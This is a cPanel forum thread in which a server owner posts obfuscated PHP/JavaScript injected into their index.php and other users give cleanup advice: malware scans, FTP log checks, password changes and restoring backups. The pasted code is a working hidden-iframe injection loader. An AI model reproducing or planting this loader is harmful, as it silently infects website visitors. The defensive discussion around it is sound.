The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Strange Code - Not Added By Me

Discussion in 'Security' started by dlwaldow, Apr 6, 2013.

  1. dlwaldow

    dlwaldow Member

    Joined:
    Mar 18, 2013
    Messages:
    8
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Root Administrator
    I think I have some bug on my VPS (I have root access). In my index.php (and give it time it'll spread to my header and footer.php too) I find this code;

    Code:
    <?
    #3b3cf8#
                                                                                                                                                                                                                                                                                                                                                                                                                    echo "                                                                                                                                                                                                                                                                                                                                                                                                                <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                                                                                                                                                                                asq=function(){return n[i];};ww=window;ss=String[\"fro\"+\"mC\"+\"harC\"+\"o\"+\"de\"];try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}if(whwej){try{}catch(agdsg){whwej=0;}try{document.body--;}catch(bawetawe){if(ww.document){n=\"0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x75,0x7a,0x66,0x68,0x62,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x73,0x64,0x21,0x3e,0x21,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x78,0x78,0x78,0x2f,0x71,0x73,0x6a,0x77,0x62,0x75,0x66,0x74,0x76,0x71,0x66,0x73,0x64,0x62,0x73,0x74,0x2f,0x64,0x70,0x6e,0x30,0x78,0x71,0x6a,0x6e,0x62,0x68,0x66,0x74,0x30,0x73,0x66,0x6d,0x2f,0x71,0x69,0x71,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x21,0x3e,0x21,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x63,0x70,0x73,0x65,0x66,0x73,0x21,0x3e,0x21,0x28,0x31,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x69,0x66,0x6a,0x68,0x69,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x78,0x6a,0x65,0x75,0x69,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x6a,0x67,0x21,0x29,0x22,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x75,0x7a,0x66,0x68,0x62,0x28,0x2a,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x28,0x3d,0x65,0x6a,0x77,0x21,0x6a,0x65,0x3e,0x5d,0x28,0x75,0x7a,0x66,0x68,0x62,0x5d,0x28,0x3f,0x3d,0x30,0x65,0x6a,0x77,0x3f,0x28,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x75,0x7a,0x66,0x68,0x62,0x28,0x2a,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x75,0x7a,0x66,0x68,0x62,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7e,0xe,0xb,0x7e,0x2a,0x29,0x2a,0x3c\".split(\",\");h=2;s=\"\";if(whwej){for(i=0;i-510!=0;i++){k=i;s=s.concat(ss(eval(asq())-1));}z=s;ww[\"eval\"](\"\"+s);}}}}</script>";
    
    #/3b3cf8#
    ?>
    Does anyone know what this is and/or how to get rid of it? :/ I've had to completely reformat my server once before, but now I have a couple of clients on it and I don't want to blow their work out. It's been two to three weeks since the server reformat and this thing is back. I don't understand it. I'm not running joomla at all. These are simple php files that I've created without the help of any other software. The only other things I'm running are Piwigo gallery, fanupdate 3, phpbb (latest), and TheHostingTool. This thing was on the server (before the rebuild) and at the time phpbb and thehostingtool weren't installed. :/
     
  2. quietFinn

    quietFinn Well-Known Member

    Joined:
    Feb 4, 2006
    Messages:
    998
    Likes Received:
    10
    Trophy Points:
    18
    Location:
    Finland
    cPanel Access Level:
    Root Administrator
    You got hacked.
     
  3. hostrazor

    hostrazor Member

    Joined:
    Mar 28, 2013
    Messages:
    8
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Root Administrator
    Install rootkit / clamav and maldetect onto your server as root and then scan for malware
     
  4. dlwaldow

    dlwaldow Member

    Joined:
    Mar 18, 2013
    Messages:
    8
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Root Administrator
    ClamAV and Maldetect found absolutely nothing at all. As far as rootkit, I have no idea where I can grab one for the server and install via ssh :/
     
  5. quietFinn

    quietFinn Well-Known Member

    Joined:
    Feb 4, 2006
    Messages:
    998
    Likes Received:
    10
    Trophy Points:
    18
    Location:
    Finland
    cPanel Access Level:
    Root Administrator
    I have seen that a few times and every time it was uploaded using FTP, i.e. the hacker had got access to the customer's PC and got the cPanel/FTP username & password.

    Check FTP access logs in /var/log/messages
     
  6. dlwaldow

    dlwaldow Member

    Joined:
    Mar 18, 2013
    Messages:
    8
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Root Administrator
    Ftp access logs from a ? at the local ip. Do you know how to prevent this by chance?
     
  7. quietFinn

    quietFinn Well-Known Member

    Joined:
    Feb 4, 2006
    Messages:
    998
    Likes Received:
    10
    Trophy Points:
    18
    Location:
    Finland
    cPanel Access Level:
    Root Administrator
    In /var/log/messages you see if someone has connected to that account using FTP, and in that case you see the IP address they connect from. Blocking that IP does not really help, but if you see that FTP has been used to upload those changed files then you know the way they have used.

    The password of that account must be changed of course, and the owner of that account (or anyone who had the password) must scan their PC very well.
     
  8. dlwaldow

    dlwaldow Member

    Joined:
    Mar 18, 2013
    Messages:
    8
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Root Administrator
    I rebuilt my computer completely to get rid of the Trojan that was on it. I went back into cpanel to clean the files and am finding this instead. Is it the same thing?

    Code:
    <!--3b3cf8--><img src="http://localhost/" ><!--/3b3cf8-->
    Code:
    <?
    #3b3cf8#
    echo('<img src=\"http://localhost/\" >');
    #/3b3cf8#
    ?>
    Should I be going through SSH and finding all instances of this code?
     
  9. mattsh

    mattsh Registered

    Joined:
    Sep 10, 2013
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Root Administrator
    I'm also getting this on 2 sites on the same hosting. My personal site (hosted elsewhere) does not have this problem.

    Aside from scans, does anyone have any specific ideas on how to fix this?
     
  10. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    30,678
    Likes Received:
    648
    Trophy Points:
    113
    cPanel Access Level:
    Root Administrator
    I recommend consulting with a qualified system administrator to investigate your system to determine how it was exploited. Note that if your server was rooted, reinstalling the OS/cPanel and restoring the accounts is typically the best way to ensure the server is cleaned.

    Thank you.
     
  11. quizknows

    quizknows Well-Known Member

    Joined:
    Oct 20, 2009
    Messages:
    940
    Likes Received:
    55
    Trophy Points:
    28
    cPanel Access Level:
    DataCenter Provider
    I've seen this hack a ton of times. 99.99% of the time the server is not rooted: either your FTP password was used to upload the modified files, or your CMS had a weak admin password or old plugin used to modify the files.

    If you're lucky and you disabled cPanel's default 24 hour deletion of access logs for Apache, you can use the time stamps from the files to consult your apache domlogs to see if there is a malicious PHP script used around that time.

    You will ultimately need to remove the bad code or restore the infected files from a clean backup. At that time make sure you disable domlog deletion in WHM, or enable Raw Access Log archiving in cPanel for the domain; this way if it gets "hacked" again you can track it down.
     
  12. Aaron.Edwards

    Aaron.Edwards Active Member

    Joined:
    Sep 21, 2013
    Messages:
    36
    Likes Received:
    0
    Trophy Points:
    6
    cPanel Access Level:
    Root Administrator
    Try with the small shell script to check if some one tried to hack the user ftp account from the same ip address ?

    Code:
    #!/bin/sh
            awk '/pure-ftpd: \([^\?].*/ { print $6 }' /var/log/messages* |
            sed 's/^(\(.*\))/\1/' |
            awk -F@ '{ if ($2) print $2 " " $1 }'  |
            sort | uniq |
            awk '{print $1}' |
            uniq -c |
            awk '{if ($1 > 2) print $2}' |
            while read ipaddr; do
                    echo ${ipaddr}:
                    awk '/pure-ftpd: \([^?].*@'${ipaddr}'\)/' /var/log/messages* |
                    sed 's/^.*(\([a-z0-9A-Z_][[a-z0-9A-Z_]*\)@.*/\1/' |
                    sort | uniq
            done 
    
     
Loading...

Share This Page